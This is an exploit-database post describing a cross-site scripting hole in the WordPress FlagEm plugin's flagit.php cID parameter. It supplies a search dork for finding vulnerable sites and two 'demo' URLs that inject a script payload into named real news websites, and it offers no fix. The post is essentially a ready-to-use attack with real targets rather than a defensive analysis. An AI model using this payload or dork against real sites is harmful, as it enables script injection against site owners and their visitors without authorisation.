WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities

2013-07-22 13:10:58
Inviato da: irist.ir

#################################

# Iranian Exploit DataBase

# http://iedb.ir

#################################

# Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://iedb.ir

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/plugins/FlagEm/

#################################

# Exploit :

# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]

# Dem0 :

# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

# http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>

#################################


# Exploit Archive = http://www.iedb.ir/exploits-269.html

#################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.